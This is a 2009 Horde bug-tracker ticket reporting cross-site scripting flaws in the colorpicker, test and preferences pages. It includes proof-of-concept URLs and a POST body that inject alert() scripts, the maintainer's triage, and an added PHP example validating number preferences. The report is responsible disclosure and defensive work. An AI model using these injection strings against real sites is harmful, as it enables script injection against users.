2014-11-28

[#8399] Number preferences are not validated properly
Summary Number preferences are not validated properly
Queue Horde Base
Queue Version HEAD
Type Bug
State Resolved
Priority 2. Medium
Owners chuck (at) horde (dot) org
Requester security (at) davidwharton (dot) us
Created 2009-07-03 (1974 days ago)
Due
Updated 2009-07-11 (1966 days ago)
Assigned 2009-07-11 (1966 days ago)
Resolved 2009-07-11 (1966 days ago)
Milestone 3.3.5
Patch No

History
2009-07-11 23:40:05 Chuck Hagenbuch Comment #4
Taken from Horde Developers
State ⇒ Resolved
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
2009-07-11 21:08:06 Chuck Hagenbuch Comment #2
Milestone ⇒ 3.3.5
Version ⇒ HEAD
State ⇒ Assigned
Summary ⇒ Number preferences are not validated properly
Assigned to Horde Developers
Assigned to Chuck Hagenbuch
> Multiple cross site scripting vulnerabilities exist.  Proof of concepts:

Horde 3.1 has been deprecated for a long time. The current stable
version is 3.3, and we backport serious security fixes to 3.2.

> http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

This file doesn't exist in 3.2 or later.

This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9

> POST to http://hordeserver.com/horde/services/prefs.php with the
> following content:
> actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on

This I can actually reproduce as a problem. Patch forthcoming.
2009-07-03 18:48:49 security (at) davidwharton (dot) us Comment #1
State ⇒ Unconfirmed
Patch ⇒ No
Milestone ⇒
Queue ⇒ Horde Base
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Type ⇒ Bug
Priority ⇒ 2. Medium
Multiple cross site scripting vulnerabilities exist.  Proof of concepts:

http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>

https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>

POST to http://hordeserver.com/horde/services/prefs.php with the
following content:

actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on
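
One way to validate number-type preferences on the server before they are stored or written into a page, as an added PHP example; it is not Horde's code or the fix committed for this ticket, and the schema, ranges, default value and function name are hypothetical.

```php
<?php
// Added illustration, not Horde's code. Schema, ranges and names are hypothetical.
const PREF_SCHEMA = [
    'sidebar_width'        => ['type' => 'number', 'min' => 50, 'max' => 1000],
    'summary_refresh_time' => ['type' => 'number', 'min' => 0,  'max' => 86400],
    'menu_view'            => ['type' => 'enum', 'values' => ['text', 'icon', 'both']],
];

/**
 * Check submitted preference values against the schema.
 * Returns [accepted, rejected]; rejected values are never stored.
 * Keys that are not in the schema are ignored.
 */
function validate_prefs(array $submitted): array
{
    $accepted = [];
    $rejected = [];
    foreach (PREF_SCHEMA as $name => $rule) {
        if (!array_key_exists($name, $submitted)) {
            continue;
        }
        $value = $submitted[$name];
        $ok = false;
        if ($rule['type'] === 'number') {
            // ctype_digit() accepts only a non-empty run of 0-9:
            // no sign, whitespace, CR/LF, comment markers or markup.
            $ok = is_string($value) && ctype_digit($value) && strlen($value) <= 9
                && (int)$value >= $rule['min'] && (int)$value <= $rule['max'];
            if ($ok) {
                $value = (int)$value; // store as an integer, not the raw string
            }
        } elseif ($rule['type'] === 'enum') {
            $ok = in_array($value, $rule['values'], true);
        }
        if ($ok) { $accepted[$name] = $value; } else { $rejected[] = $name; }
    }
    return [$accepted, $rejected];
}

// Constructed input modelled on the POST body in the report (URL-decoded).
$post = [
    'sidebar_width'        => "1337//-->\r%<script>alert('XSS')</script>//",
    'summary_refresh_time' => '0',
    'menu_view'            => 'text',
];
[$accepted, $rejected] = validate_prefs($post);
// A validated value is still encoded for the context it is written into.
echo 'var sidebarWidth = ' . json_encode($accepted['sidebar_width'] ?? 150) . ";\n";
echo 'rejected: ' . htmlspecialchars(implode(', ', $rejected), ENT_QUOTES, 'UTF-8') . "\n";
```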